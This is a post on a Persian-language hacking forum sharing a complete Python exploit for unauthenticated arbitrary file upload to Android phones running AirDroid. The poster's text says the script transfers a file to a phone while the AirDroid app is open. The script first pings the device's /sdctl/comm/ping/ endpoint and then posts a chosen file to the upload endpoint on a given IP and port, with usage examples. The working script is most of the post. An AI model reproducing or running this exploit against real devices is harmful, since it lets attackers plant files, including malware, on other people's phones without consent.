انجمن تیم امنیتی ایران سایبر

AirDroid Unauthenticated Arbitrary File Upload

شروع موضوع توسط T3RMINAT0R ‏7/7/15 در انجمن Vulnerability Laboratory

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. T3RMINAT0R
    کاربرتازه وارد

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏4/7/15
    ارسال ها:
    63
    تشکر شده:
    172
    جنسیت:
    شغل:
    HACKING -CRACKING
    محل سکونت:
    PARSIAN
    Name:
    M0H4M4D
    Main os:
    Kali
    با سلام
    این Exploit کارش اینکه با باز کردن airdroid در اندروید فایل رو به گوشی منتقل میکنه
    البته باید برنامه airdroid باز باشه
    و این Exploit به زبان pythone نوشته شده
    موفق باشید
    کد:
    #/IN THE NAME OF GOD
    #/auth====PARSA ADIB
    
    import sys,requests,re,urllib2
    def logo():
    print"\t\t       .__           .___             .__    .___"
    print"\t\t_____  |__|______  __| _/______  ____ |__| __| _/"
    print"\t\t\__  \ |  \_  __ \/ __ |\_  __ \/  _ \|  |/ __ | "
    print"\t\t / __ \|  ||  | \/ /_/ | |  | \(  <_> )  / /_/ | "
    print"\t\t(____  /__||__|  \____ | |__|   \____/|__\____ | "
    print"\t\t     \/               \/                      \/ "
    print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
    if len(sys.argv)<6 or len(sys.argv)>6 :
    logo()
    print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
    print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
    else :
    logo()
    print "\n[+]Reciving Details\n-----------------------------"
    try :
      p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/')
    except IOError :
      print "\n[!] Check If server is Running"
      sys.exit()
    for i in p.content.split(',') :
      for char in '{"}_':
       i = i.replace(char,'').upper()
      print "[*]"+i+""
    print "\n[+]Sending File\n-----------------------------"
    try : 
      r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
      if (r.status_code == 200) :
       print "[*]RESPONSE:200"
       print "[*]FILE SENT SUCCESSFULY"
    except IOError :
      print "\n[!] Error"

     
    JOK3R از این پست تشکر کرده است.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .